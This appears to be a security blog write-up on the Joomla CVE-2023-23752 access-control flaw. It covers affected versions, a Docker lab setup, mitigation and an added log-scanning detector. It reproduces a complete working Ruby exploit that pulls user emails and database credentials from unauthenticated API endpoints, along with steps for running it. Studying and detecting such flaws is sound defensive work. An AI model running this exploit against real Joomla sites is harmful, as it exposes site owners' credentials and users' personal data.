Navigating the Joomla Unauthorized Access Vulnerability – CVE-2023-23752

Joomla, a globally recognized content management system, has recently encountered a significant security issue.

Developed in PHP with a MySQL database, Joomla runs on multiple platforms including Linux, Windows, and macOS.

However, even such robust systems are not immune to vulnerabilities, as evidenced by the recent discovery of an unauthorized access vulnerability (CVE-2023-23752).

Despite its advanced design and widespread usage, it became apparent that Joomla was susceptible to a significant security flaw that could potentially jeopardize sensitive information.

In the forthcoming sections, we will explore this unauthorized access vulnerability in greater detail, delve into its potential implications, and discuss the necessary steps Joomla has taken to mitigate this issue.

Understanding the Implications of CVE-2023-23752

This security flaw was discovered and reported by a researcher from NSFOCUS Tianji Lab, and Joomla released an official notice to address it. The vulnerability lies in Joomla’s access control for its web service endpoints.

This flaw allows unauthenticated attackers to reach the REST API interface and retrieve Joomla configuration information.

An attacker exploits it by sending specially crafted requests, which can expose sensitive information.

To put it simply, the attackers have found a way to bypass the normal authentication process and directly access the data they are not supposed to see.

At this point, the Proof of Concept (PoC) along with the details of the vulnerability have been publicly disclosed. This means that potential attackers now have a roadmap to exploit this vulnerability, making it even more critical for affected users to take immediate protective actions.

Scope of Impact and Affected Versions

The scope of the impact of this vulnerability is substantial, affecting a range of Joomla versions. Specifically, Joomla versions from 4.0.0 through to 4.2.7 are vulnerable to this unauthorized access flaw. This means that any website or platform running these versions of Joomla could potentially be exposed to unauthenticated attackers.

However, it’s important to note that versions of Joomla from 4.2.8 onwards are not affected by this vulnerability. Users operating on these later versions can rest assured that their platforms are safe from this particular security flaw.

Nevertheless, it is always crucial to regularly update your software to the latest version to ensure maximum protection against potential vulnerabilities.

Proof-of-Concept (PoC)

The recent disclosure of a significant security vulnerability, CVE-2023-23752, affecting Joomla versions 4.0.0 to 4.2.7 has raised many eyebrows in the digital community.

This guide will walk you through the process of exploiting this security flaw for research purposes, using an open-source tool available on GitHub.

exploit.rb:

#!/usr/bin/env ruby

# Exploit
## Title: Joomla! < 4.2.8 - Unauthenticated information disclosure
## Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr)
## Author website: https://pwn.by/noraj/
## Exploit source: https://github.com/Acceis/exploit-CVE-2023-23752
## Date: 2023-03-24
## Vendor Homepage: https://www.joomla.org/
## Software Link: https://downloads.joomla.org/cms/joomla4/4-2-7/Joomla_4-2-7-Stable-Full_Package.tar.gz?format=gz
## Version: 4.0.0 < 4.2.8 (it means from 4.0.0 up to 4.2.7)
## Tested on: Joomla! Version 4.2.7
## CVE : CVE-2023-23752

# Vulnerability
## Discoverer: Zewei Zhang from NSFOCUS TIANJI Lab
## Date: 2023-02-24
## Discoverer website: https://nsfocusglobal.com/company-overview/nsfocus-security-labs/
## Title: Joomla Unauthorized Access
## CVE: CVE-2023-23752
## Patch: Update to >= 4.2.8
## References:
##   - https://nsfocusglobal.com/joomla-unauthorized-access-vulnerability-cve-2023-23752-notice/
##   - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html
##   - https://attackerkb.com/topics/18qrh3PXIX/cve-2023-23752
##   - https://nvd.nist.gov/vuln/detail/CVE-2023-23752
##   - https://vulncheck.com/blog/joomla-for-rce
##   - https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2023/CVE-2023-23752.yaml

# standard library
require 'json'
# gems
require 'httpx'
require 'docopt'
require 'paint'

doc = <<~DOCOPT
  #{Paint['Joomla! < 4.2.8 - Unauthenticated information disclosure', :bold]}

  #{Paint['Usage:', :red]}
    #{__FILE__} <url> [options]
    #{__FILE__} -h | --help

  #{Paint['Parameters:', :red]}
    <url>       Root URL (base path) including HTTP scheme, port and root folder

  #{Paint['Options:', :red]}
    --debug     Display arguments
    --no-color  Disable colorized output (NO_COLOR environment variable is respected too)
    -h, --help  Show this screen

  #{Paint['Examples:', :red]}
    #{__FILE__} http://127.0.0.1:4242
    #{__FILE__} https://example.org/subdir

  #{Paint['Project:', :red]}
    #{Paint['author', :underline]} (https://pwn.by/noraj / https://twitter.com/noraj_rawsec)
    #{Paint['company', :underline]} (https://www.acceis.fr / https://twitter.com/acceis)
    #{Paint['source', :underline]} (https://github.com/Acceis/exploit-CVE-2023-23752)
DOCOPT

def fetch_users(root_url, http)
  vuln_url = "#{root_url}/api/index.php/v1/users?public=true"
  http.get(vuln_url)
end

def parse_users(root_url, http)
  data_json = fetch_users(root_url, http)
  data = JSON.parse(data_json)['data']
  users = []
  data.each do |user|
    if user['type'] == 'users'
      id = user['attributes']['id']
      name = user['attributes']['name']
      username = user['attributes']['username']
      email = user['attributes']['email']
      groups = user['attributes']['group_names']
      users << {id: id, name: name, username: username, email: email, groups: groups}
    end
  end
  users
end

def display_users(root_url, http)
  users = parse_users(root_url, http)
  puts Paint['Users', :red, :bold]
  users.each do |u|
    puts "[#{u[:id]}] #{u[:name]} (#{Paint[u[:username], :yellow]}) - #{u[:email]} - #{u[:groups]}"
  end
end

def fetch_config(root_url, http)
  vuln_url = "#{root_url}/api/index.php/v1/config/application?public=true"
  http.get(vuln_url)
end

def parse_config(root_url, http)
  data_json = fetch_config(root_url, http)
  data = JSON.parse(data_json)['data']
  config = {}
  data.each do |entry|
    if entry['type'] == 'application'
      key = entry['attributes'].keys.first
      config[key] = entry['attributes'][key]
    end
  end
  config
end

def display_config(root_url, http)
  c = parse_config(root_url, http)
  puts Paint['Site info', :red, :bold]
  puts "Site name: #{c['sitename']}"
  puts "Editor: #{c['editor']}"
  puts "Captcha: #{c['captcha']}"
  puts "Access: #{c['access']}"
  puts "Debug status: #{c['debug']}"
  puts
  puts Paint['Database info', :red, :bold]
  puts "DB type: #{c['dbtype']}"
  puts "DB host: #{c['host']}"
  puts "DB user: #{Paint[c['user'], :yellow, :bold]}"
  puts "DB password: #{Paint[c['password'], :yellow, :bold]}"
  puts "DB name: #{c['db']}"
  puts "DB prefix: #{c['dbprefix']}"
  puts "DB encryption: #{c['dbencryption']}"
end

begin
  args = Docopt.docopt(doc)
  Paint.mode = 0 if args['--no-color']
  puts args if args['--debug']

  http = HTTPX
  display_users(args['<url>'], http)
  puts
  display_config(args['<url>'], http)
rescue Docopt::Exit => e
  puts e.message
end

Prerequisites

Before we dive into the exploitation process, there are a few requirements you need to meet:

  • httpx: This is a Ruby HTTP client designed for ease and resilience. It can be installed using the command gem install httpx.
  • docopt.rb: A command-line argument parser that will make creating beautiful command-line interfaces a breeze. Use gem install docopt to add it to your environment.
  • paint: An easy-to-use terminal colorization library. It can be added with gem install paint.

Alternatively, you can install all these libraries at once by using the bundle install command.

Setting Up a Vulnerable Environment

To safely experiment with this exploit, we recommend setting up a controlled environment. One way to do this is by deploying a vulnerable version of Joomla (v4.2.7) using Docker. Here are the steps:

  1. Run the command docker-compose up --build to start the Docker instance.
  2. Open a web browser and navigate to http://127.0.0.1:4242/installation/index.php. You should see the Joomla installation page.
  3. Complete the installation process. When asked for database credentials, use ‘root’ for both username and password. For the host, enter ‘mysql’.

Please note that this setup is not intended for production use due to its inherent vulnerability.

Exploiting the Vulnerability

With the vulnerable environment set up, you can now proceed to exploit the CVE-2023-23752 vulnerability.

The exploit script exploit.rb is designed to interact with the Joomla instance and retrieve sensitive information.

To use the script, run ruby exploit.rb -h for its usage and options. For example, to exploit a local Joomla instance, you would run ruby exploit.rb http://127.0.0.1:4242.

The script will then attempt to bypass the authentication process and retrieve sensitive data including user and database information. Remember, this is for educational purposes only and should not be used maliciously.

By understanding how this exploit works, we can better protect our systems and data from potential security threats. Always ensure your software is updated to the latest version to mitigate such vulnerabilities.
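As an added example, not part of the original post or of the exploit repository, the following Ruby script applies the two request patterns the exploit uses (the users and config/application endpoints with public=true) to web-server access logs, so a defender can spot exploitation attempts and tell a successful leak (HTTP 200) from a denied one. The log lines are constructed for illustration.

```ruby
# Added example (not part of the original post or the exploit project):
# flag access-log entries matching the CVE-2023-23752 request patterns.
require 'uri'

# Apache/nginx "combined" log format: client, timestamp, request line, status.
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<target>\S+) \S+" (?<status>\d{3})/

# Endpoints read by the exploit; a request is suspicious when it hits one of
# them with public=true, the parameter that bypassed authentication.
VULN_PATHS = %w[/api/index.php/v1/users /api/index.php/v1/config/application].freeze

def suspicious_request?(target)
  uri = URI.parse(target)
  return false unless VULN_PATHS.any? { |p| uri.path.end_with?(p) }
  # decode_www_form returns [[key, value], ...]; an absent query yields []
  URI.decode_www_form(uri.query.to_s).any? { |k, v| k == 'public' && v.casecmp?('true') }
rescue URI::InvalidURIError
  false
end

# Returns one hash per suspicious request; :leaked is true when the server
# answered 200, i.e. the unauthenticated read most likely succeeded.
def scan_log(lines)
  lines.filter_map do |line|
    m = LOG_RE.match(line) or next
    next unless suspicious_request?(m[:target])
    { ip: m[:ip], time: m[:ts], path: m[:target], status: m[:status].to_i,
      leaked: m[:status] == '200' }
  end
end

# Constructed sample: two successful reads, one benign hit, one denied attempt.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [24/Mar/2023:10:01:02 +0000] "GET /api/index.php/v1/users?public=true HTTP/1.1" 200 1532 "-" "curl/7.88"
  203.0.113.7 - - [24/Mar/2023:10:01:03 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 2210 "-" "curl/7.88"
  198.51.100.4 - - [24/Mar/2023:10:02:00 +0000] "GET /index.php/component/content/ HTTP/1.1" 200 8811 "-" "Mozilla/5.0"
  198.51.100.9 - - [24/Mar/2023:10:03:00 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 401 120 "-" "curl/7.88"
LOG

if $PROGRAM_NAME == __FILE__
  scan_log(SAMPLE_LOG.lines).each do |hit|
    puts "#{hit[:leaked] ? 'LEAK   ' : 'ATTEMPT'} #{hit[:ip]} [#{hit[:time]}] #{hit[:path]} -> #{hit[:status]}"
  end
end
```

A 200 on the config/application endpoint means the database credentials in that response should be treated as compromised and rotated, in addition to applying the 4.2.8 update.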

Mitigation

Joomla has been proactive in addressing this issue, providing an update to fix this unauthorized access vulnerability.

Users who utilize Joomla’s platform should ensure they have implemented this update as soon as possible to safeguard their sensitive information from potential attacks.

Conclusion

The reality of our increasingly digital world is that software vulnerabilities like CVE-2023-23752 will continue to emerge.

However, as we’ve seen in this instance, swift detection, transparent reporting, and immediate remediation can significantly curb the potential harm.

The issue with Joomla was handled adeptly, showcasing the importance of robust cybersecurity practices.

For us as users, our most potent safeguard against these threats lies in staying abreast of the latest developments and taking immediate action when necessary.

This includes regular software updates, adhering to recommended security protocols, and maintaining an awareness of the digital landscape.

By doing so, we can ensure our digital environments remain as secure as possible, even in the face of unexpected vulnerabilities.